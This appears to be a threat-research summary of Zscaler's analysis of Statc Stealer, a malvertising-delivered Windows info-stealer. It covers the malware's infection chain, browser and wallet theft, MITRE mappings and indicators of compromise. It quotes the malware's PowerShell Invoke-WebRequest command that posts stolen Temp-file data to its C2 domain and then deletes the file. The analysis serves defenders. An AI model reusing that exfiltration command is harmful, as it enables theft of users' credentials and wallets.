Threat Research

Statc Stealer: Decoding the Elusive Malware Threat

ZScaler

Zscaler ThreatLabz analyzed Statc Stealer, an info-stealer distributed via malvertising that uses a dropper, downloader, and PowerShell to install a C++-based stealer on Windows systems. It harvests browser data and numerous crypto wallet types, encrypts the results, and exfiltrates them to C2 infrastructure such as topgearmemory[.]com. #StatcStealer #Zscaler

Keypoints

  • Distribution: Statc is delivered via malvertising (drive-by) that tricks users into downloading a malicious installer.
  • Initial components: The initial dropper deploys a decoy PDF installer and a downloader binary that runs a PowerShell script to fetch the Statc payload.
  • Evasion: The binary checks its filename against a hardcoded encrypted name and aborts execution if mismatched to hinder sandboxing and reverse engineering.
  • Data collection: Targets major Windows browsers and many browser-based cryptocurrency wallets, harvesting cookies, login data, autofill items, and messaging app data (e.g., Telegram).
  • Local handling: Stolen data is encrypted, written to text files in the Temp folder, and then transmitted to C2 via HTTPS requests.
  • Exfiltration: Uses Invoke-WebRequest PowerShell calls to POST encrypted Temp files to C2 endpoints (topgearmemory[.]com).
  • IOCs: Includes MD5 hashes for dropper/downloader/payload, malicious URLs/IP (95[.]217[.]5[.]87, check[.]topgearmemory[.]com), and filenames like Version2023-new.exe.

MITRE Techniques

  • [T1547] Boot or Logon Autostart Execution – Mapped by Zscaler as a persistence technique observed in analysis (‘T1547 Boot or Logon Autostart Execution’)
  • [T1217] Browser Information Discovery – Statc enumerates and targets browser-stored data for theft (‘Browser exfiltration is the unauthorized transfer of any data from a browser.’)
  • [T1059] Command and Scripting Interpreter – Uses PowerShell to download and post stolen data, e.g., Invoke-WebRequest usage (‘Invoke-WebRequest -Uri https[:]//topgearmemory[.]com/kdsfedafa/stat?c= -Method POST -InFile C:UsersAppDataLocalTemp41075.txt -UseDefaultCredentials -UseBasicParsing ; Remove-Item C:UsersAppDataLocalTemp41075.txt’)
  • [T1555] Credentials from Password Stores – Extracts credentials and autofill data from browser stores and wallets (‘Statc Stealer is able to take sensitive information from various browsers and wallets, and then store the data in a text file inside a Temp folder.’)
  • [T1132] Data Encoding – Encrypts stolen data and uses HTTPS to hide exfiltration to C2 (‘Statc Stealer uses HTTPS protocol to send stolen, encrypted data to the command-and-control (C&C) server.’)
  • [T1005] Data from Local System – Writes harvested artifacts to local Temp files prior to exfiltration (‘stores the data in a text file inside a Temp folder’ / ‘saves stolen data into text files and stores them in the Temp folder.’)
  • [T1001] Data Obfuscation – Uses encrypted strings and encoded payloads; analysts had to decrypt strings via a Python script (‘Using the python script we mentioned above, we decrypted Statc Stealer’s encrypted strings.’)
  • [T1189] Drive-by Compromise – Delivered through malicious/advertisement links in Chrome that initiate the download/execution chain (‘the attack chain begins with an innocuous-looking advertisement within the victim’s Google Chrome browser.’)

Indicators of Compromise

  • [MD5 Hashes] Samples and their roles – f77dc89afbaab53e5f63626e122db61e (dropper), 3834ec03aee0860dfd781805cac3e649 (downloader), and 3 more hashes.
  • [Domain/IP] Malicious download and C2 – 95[.]217[.]5[.]87 (initial sample URL: 95[.]217[.]5[.]87/Setup64_new0/Version2023-new[.]exe), check[.]topgearmemory[.]com (payload/C2 endpoints: check[.]topgearmemory[.]com/dw/… and topgearmemory[.]com/kdsfedafa/stat?c=).
  • [File names] Observed malicious binaries – Version2023-new.exe, chtgpt_x64.exe (additional names: SearchApplication.exe, sound_adapter.exe).
  • [PowerShell/Temp file] Exfiltration artifacts – Invoke-WebRequest PowerShell command posting C:UsersAppDataLocalTemp41075.txt to C2, and the Temp file path C:UsersAppDataLocalTemp41075.txt.

Statc Stealer is deployed via malvertising that lures users into downloading a seemingly legitimate installer. The initial dropper places a decoy PDF installer and a downloader binary; the downloader invokes a PowerShell command to fetch the final Statc payload from domains such as check.topgearmemory[.]com or an IP-hosted executable (95[.]217[.]5[.]87/Setup64_new0/Version2023-new.exe).

Once executed, the payload (a Win32 PE written in C++) performs filename integrity checks against a hardcoded encrypted name to detect tampering or sandboxing, aborting if mismatched. The stealer enumerates and collects browser artifacts (cookies, Web Data, Local State, autofill, login data), messaging app files (e.g., Telegram), FTP data (FileZilla), and numerous browser wallet files, then encrypts the harvested output and writes it to Temp as text files.

For exfiltration, Statc uses PowerShell Invoke-WebRequest to POST the encrypted Temp file to its C2 over HTTPS (e.g., topgearmemory[.]com/kdsfedafa/stat?c=), then removes local traces. Notable IOCs include MD5 hashes (e.g., f77dc89afbaab53e5f63626e122db61e, 3834ec03aee0860dfd781805cac3e649), malicious URLs/IPs (95[.]217[.]5[.]87 and check[.]topgearmemory[.]com), and filenames like Version2023-new.exe; defenders should monitor for the PowerShell Invoke-WebRequest patterns, Temp file creation, and the listed hashes/domains.

Read more: https://www.zscaler.com/blogs/security-research/statc-stealer-decoding-elusive-malware-threat

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint